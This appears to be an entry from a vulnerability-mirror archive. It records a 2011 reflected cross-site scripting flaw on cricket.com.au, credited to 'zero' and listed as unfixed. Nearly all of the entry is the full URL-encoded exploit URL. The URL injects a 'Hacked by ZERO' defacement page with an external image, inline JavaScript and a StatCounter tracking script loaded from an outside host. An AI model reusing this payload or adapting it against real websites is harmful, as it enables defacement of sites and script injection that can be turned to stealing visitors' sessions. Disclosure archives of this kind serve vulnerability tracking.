Security researcher zero submitted on 23/03/2011 a cross-site scripting (XSS) vulnerability affecting cricket.com.au, which at the time of submission ranked 41477 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 23/03/2011
Date published: 11/12/2011
Fixed? Mail us!
Status: UNFIXED
Author: zero
Domain: cricket.com.au
Category: XSS
Pagerank: 41477
URL: http://cricket.com.au/searchresult/%3Chead%3E+%3Ctitle%3EHacked+by+ZERO%3C%2Ftitle%3E+%3C%2Fh1%3E%3CBODY++++BGCOLOR%3D%22%23000000%22++++TEXT%3D%22%23FFFFFF%22+%3E+%3Cbody%3E+%3C%2Fhead%3E+%3Cbr%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Cimg+src%3D%22http://img156.imageshack.us/img156/1594/zeroso.png%22++%3E%3C%2Fcenter%3E+%3Cbr%3E+%3Ch3%3E+%3C%2Fcaption%3E+%3Ccenter%3E%3Ccaption%3E$+HACK%20+$+ME+$+IF%20U%20CAN+$%3C%2Fa%3E%3C%2Fcenter%3E+%3C%2Fcaption%3E+%3Cbr%3E+%3Ccenter%3E+%3Cbody+onLoad%3D%22document.form.input.focus%28%29%3B%22%3E++%3Cbr%3E+%3Cfont+color%3D%22red%22%3E%3Cspan+id%3D%22typing%22%3E+Your+site+is+vulnerable+to+xxs+%3Cbr%3E+Hacked+by+ZERO%3C%2Fspan%3E++%3Cscript+type%3D%22text%2Fjavascript%22%3E++interval+%3D+30%3B+%2F%2F+Interval+in+milliseconds+to+wait+between+characters++if%28document.getElementById%29+%7B+t+%3D+document.getElementById%28%22typing%22%29%3B+if%28t.innerHTML%29+%7B+typingBuffer+%3D+%22%22%3B+%2F%2F+buffer+prevents+some+browsers+stripping+spaces+it+%3D+0%3B+mytext+%3D+t.innerHTML%3B+t.innerHTML+%3D+%22%22%3B+typeit%28%29%3B+%7D+%7D++function+typeit%28%29+%7B+mytext+%3D+mytext.replace%28%2F%3C%28%5B%5E%3C%5D%29*%3E%2F%2C+%22%22%29%3B+%2F%2F+Strip+HTML+from+text+if%28it+%3C+mytext.length%29+%7B+typingBuffer+%2B%3D+mytext.charAt%28it%29%3B+t.innerHTML+%3D+typingBuffer%3B+it%2B%2B%3B+setTimeout%28%22typeit%28%29%22%2C+interval%29%3B+%7D+%7D+%3C%2Fscript%3E+%3Cbr%3E+%3C%2Ffont%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Ccaption%3Eyou.got.hacked.by.ZERO...!!!!%3C%2Fa%3E%3C%2Fcenter%3E+%3C!--+Start+of+StatCounter+Code+--%3E+%3Cscript+type%3D%22text%2Fjavascript%22%3E+var+sc_project%3D6474887%3B++var+sc_invisible%3D1%3B++var+sc_security%3D%229181d223%22%3B++%3C%2Fscript%3E++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fwww.statcounter.com%2Fcounter%2Fcounter.js%22%3E%3C%2Fscript%3E%3Cnoscript%3E%3Cdiv+class%3D%22statcounter%22%3E%3Ca+title%3D%22hit+counter%22+href%3D%22http%3A%2F%2Fstatcounter.com%2Ffree_hit_counter.html%22+target%3D%22_blank%22%3E%3Cimg+class%3D%22statcounter%22+src%3D%22http%3A%2F%2Fc.statcounter.com%2F6474887%2F0%2F9181d223%2F1%2F%22+alt%3D%22hit+counter%22+%3E%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E+%3C!--+End+of+StatCounter+Code+--%3E%3C%2Fbody%3E+%3C%2Fdiv%3E+%3C%2Fform%3E+%3C%2Fcenter%3E+%3C%2Fbody%3E&x=0&y=0